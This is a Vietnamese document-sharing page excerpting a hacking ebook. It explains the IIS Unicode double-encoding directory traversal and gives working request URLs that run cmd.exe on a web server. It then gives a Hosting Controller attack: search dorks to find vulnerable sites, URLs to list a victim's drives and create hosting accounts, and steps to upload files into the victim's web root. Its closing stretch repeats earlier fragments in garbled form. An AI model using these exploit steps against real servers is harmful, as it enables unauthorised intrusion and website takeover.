1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 25 docx

6 333 1

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 177,62 KB

Nội dung

Tiếc quá! nó không hoạt động. Nếu đã quen với FTP, thì bạn cũng biết lệnh DIRUP dùng để làm gì. Lệnh để đi đến một thư mục ở trên là / / Nếu bạn thiết kế bất kỳ web hay mã html nào thì chắc chắn bạn sẽ dùng được rất nhiều. Vì thế ta chỉ đặt lệnh lẫn nhau, giống như sau http://www.someserver.com/ / / Và bắt đầu truy cập vào ổ đĩa c local của server? Tốt, ta bắt đầu khai thác ở đây, nhưng người tạo IIS lại muốn tránh phiền phức, bằng cách làm server từ chối loại yêu cầu này.Vì thế ta phải làm gì đây?Bạn có bao giờ thử download một file mà trong tên của nó có khoảng trống chưa? Bạn có nhận được thông báo là trình duyệt đã biến đổi khoảng trống đó thành %20 không? Hãy làm 1 ví dụ. Nếu bạn gõ cái này trong trình duyệt: http://www.someserver.com/iis Unicode hole.txt Trình duyệt sẽ thay thế khoảng trống bằng %20 : http://www.someserver.com/iis%20unicode%20hole.txt Và sau đó mới cho phép bạn download file. Đó là cái gì, và tại sao trình duyệt lại phải làm như thế? Máy tính không thể hiểu được khoảng trống. Đơn giản là chúng không làm được vậy thôi. %20 ở đây chính là Unicode cho ký tự ASCII mà ta hay gọi là “khoảng trống”. Ký tự ASCII là những ký tự mà ta thấy trên màn hình khi dùng máy tính. Chỉ có một Unicode cho mỗi ký tự ASCII. Vì thế, khi bạn đưa một khoảng trống vào trình duyệt, nó phải được thay thế bằng cái gì mà cho máy tính có thể hiểu được trước khi nó bắt đầu tìm kiếm. Để tìm hiểu thêm về ASCII các bạn down tại : www32.brinkster.com/anhdenday/ascii.zip Từ khi trình duyệt biến đổi khoảng trống thành ký tự Unicode mới và gửi chúng đến web server mà có thể hiểu được, ta cũng có thể dùng ký tự Unicode để giải thích bất cứ thứ gì ta muốn, và web server sẽ cũng hiểu được chúng. Không chỉ với khoảng trống. Mà ta cũng có thể biến đổi lệnh DIRUP thành Unicode, và gửi chúng đến server. Ta cần biến đổi dấu gạch chéo (/) thành / / / trong Unicode. Unicode của / là %5C . Thật là tuyệt, nếu sau đó tôi chỉ cần gõ http://www.someserver.com/ %5C %5C/ và tôi có thể thấy host được không? Khai thác ở đây, nhưng có một vài lý do nó không hoạt động. Đầu tiên, nếu bạn đã làm với server’s local c:\ Bạn sẽ cần một vài thứ để đóng thư mục. Web server sẽ không làm như vậy cho bạn. Vì vậy chúng ta cần mở cmd.exe (dấu nhắc DOS) của server. Trong trình duyệt của bạn! Nhưng chúng ta sẽ quay lại vấn đề này sau. Thứ hai, khi server giải mã / %5C %5C/ Nó sẽ thành / / / mà lại bị hạn chế, và sau đó từ chối yêu cầu. Vì thế ta cần phải làm gì, hay mã hoá Unicode đã mã hóa rồi một lần nữa. Có thể bạn sẽ không theo tôi ngay bây giờ, nhưng tôi sẽ cố gắng giải thích một lần nữa. Ta cần mã hoá mọi ký tự của chuỗi Unicode đã có. Xem bảng dưới sẽ hiểu hơn. CODE ASCII UNICODE % %25 5 %35 C %43 Vì vậy khi ta mã hóa ký tự ASCII / %5C %5C/ Sang Unicode, ta được %25%35%43 %25%35%43 Và khi server đọc chuỗi ký tự này, nó sẽ trở lạI / %5C %5C/ Đó không phải là lệnh DIRUP bình thường, nên nó được cho phép. Nhưng có một vài thứ chúng ta cần biết. Như tôi đã đề cập ở trước, khi bạn kết nối đến một web server, thư mục root mặc định là wwwroot. Thư mục này những trang chính của site. Nhưng có những thư mục khác cho những trang web như yếu tố scripts. Những thư mục này có chứa file mà có khá nhiều thứ quan trọng trong web server. Vì vậy khi vận dụng server, ta cần làm nó từ thư mục mà ta đã có đặc quyền để làm. Điều này không khó; Tôi chỉ muốn bạn hiểu tại sao tôi thêm /scripts/ vào cuối URL. Rốt cuộc, khi ta thi hành lệnh ở dấu nhắc server’s local dos prompt, ta cần thi hành một lệnh cũng trong cái này. Ta muốn hiển thị c:\ ? Dễ thôi; ta chỉ cần làm vài thủ thuật khác hơn bạn thường làm ở dấu nhắc dos. Bắt đầu cmd.exe theo cách sau: cmd.exe?/c+ ? = Mọi thứ sau dòng đối số của lệnh. /c = Thi hành lệnh, sau đó đóng cmd.exe (để cho nó không chạy mãi) + = Thay thế cho khoảng trống Cuối cùng, toàn bộ lệnh ráp lại sẽ như sau: http://www.myserver.com/scripts/ %25%35%43 %25%35%43/winnt/system32/c md.exe?/c+dir+c:\ Và bạn thấy được c:\ của servers bên trong trình duyệt. Hehe? _ Chú thích: Có rất nhiều “lệnh” Unicode khác để cho ta thi hành, nếu cái này không hoạt động (có thể server đã fix được phần nào) thì thử áp dụng những cách sau: CODE /msadc/ %c0%af / %c0%af / %c0%af /winnt/system32/cmd.exe?/c+dir+C:\ /_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.e xe?/c+dir+C:\ ……. ( Một bài viết rất chất lượng của LeonHart bên www.whatvn.com ) 53 . ) Kỹ thuật hack Hosting controller : _Tìm site bị lỗi : vào Google.com đánh vào một trong các từ khoá sau : + copyright Hosting Controller . + allinurl:/advadmin . + allinurl:/admin . Sau khi tìm được ta thử xét trang Web đó có bị lỗi hay ko bằng cách sử dụng 2 đoạn code : CODE http://www.victim.com/advwebadmin*hoac admin*/stats/statsbrowse.asp?filepath=c:\&Opt=3 ( Lệnh này xem ổ đĩa của victim ) www.victim.com/advwebadmin/autosignup/newwebadmin.asp ( Lệnh này tạo một free hosting ) Nếu như 2 lệnh trên cùng thực hiên được thì ta có thể khai thác chúng được rồi đó , he he . _ Cách khai thác : + Vì tạo được hosting nên ta có thể upload được file vô tư , các bạn hãy chú ý thử xem địa chỉ mà cất các file ta vừa upload lên ở đâu ( bằng cách nhìn vào thanh statup ) . + Tiếp theo là ta làm sao chuyển cái file đó vào thư mục chứa trang chủ của nạn nhân , theo mặc định nó sẽ nằm ở đây : C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\ ( Các bạn có thể thay ổ C:\ bằng D:\ , E:\ ) + Khi xác định được chính xác địa chỉ rùi ta sẽ tìm đoạn script để làm giúp : http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\( đường dẫn đến thư mục web victim )&owwwPa th=C:\&oftpPath=C:\( đường dẫn đến thư mục ta vừa upload file ) + Các bạn có thể test đường dẫn file up lên có chính xác không bằng cách up lên file a.html bất kỳ , giả sử nó được up lên nằm ở C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html ta sẽ test bằng cách đánh đường dẫn ở URL : www.victim/admin[avdadmin]/a.html + Nếu như đúng là chính xác rồi thì chỉ cần up “Đồ nghề” lên là xong , . GOODLUCK!!!!!!!!!!!!!!!!! Tác giả:anhdenday Ghíchu : Cũng tương tư như ở các Part trên , một số đoạn trong Part 9 này có tổ hơp HTML codes , JavaScript code và mả phát hiện XSS bị chặn bởi Input Validation Filter của HVA , nên chúng đựoc trình bầy dứoi dạng các Image File - PXMMRF Kỹ thuật Hack cơ bản - Phần I **** Foot Printing **** Thân chào tất cả các bạn , nhằm đáp ứng nhu cầu học hỏi trong hacking và security, fantomas311 đã biên soạn một bộ bài viết "Basic hacking" và các bài viết liên quan đến hacking hệ thống để giới thiệu đến các bạn . Xin khuyến cáo với những ai muốn học hack một cách fast food là các bạn không nên đọc bài viết này ! Vì tôi không post những bài dạy hack cho các bạn , mà tôi chỉ post bài theo phương châm "hack như thế nào" . Hãy đọc , suy nghĩ và làm bằng đôi tay và khối óc của mình !! Trước khi các hacker thực sự bắt tay vào việc, họ phải tiến hành 3 bước cơ bản là in dấu ấn (foot printing) , Quét (scanning) và điểm danh(enumeration). Bài viết này đề cập đến kỹ thuật in dấu ấn và những vấn đề liên quan. **In dấu ấn là gì ??** In dấu ấn là việc dùng các công cụ và kỹ thuật để lấy thông tin cơ bản đầu tiên về một tổ chức hoặc một chuyên khu web muốn tấn công ( trong bài viết này tạm gọi là victim). Việc in dấu ấn có hệ thống một tổ chức sẽ cho phép hacker thấy rõ tình hình an ninh ( độ bảo mật) của tổ chức đó. **Tại sao cần in dấu ấn ??** Foot Printing giúp có thể định danh tất cả các mẩu tin và nắm những thông tin cơ bản (đôi khi khá quan trọng) về victim ** Kỹ thuật in dấu ấn ** Có rất nhiều kỹ thuật in dấu ấn khác nhau, bài viết này sẽ mô tả các bước giúp bạn . dưới sẽ hiểu hơn. CODE ASCII UNICODE % %25 5 %35 C %43 Vì vậy khi ta mã hóa ký tự ASCII / %5C %5C/ Sang Unicode, ta được %25% 35%43 %25% 35%43 Và khi server đọc chuỗi ký tự này, nó. trống Cuối cùng, toàn bộ lệnh ráp lại sẽ như sau: http://www.myserver.com/scripts/ %25% 35%43 %25% 35%43/winnt/system32/c md.exe?/c+dir+c: Và bạn thấy được c: của servers bên trong trình. GOODLUCK!!!!!!!!!!!!!!!!! Tác giả:anhdenday Ghíchu : Cũng tương tư như ở các Part trên , một số đoạn trong Part 9 này có tổ hơp HTML codes , JavaScript code và mả phát hiện XSS bị chặn bởi

Ngày đăng: 04/07/2014, 11:20

TỪ KHÓA LIÊN QUAN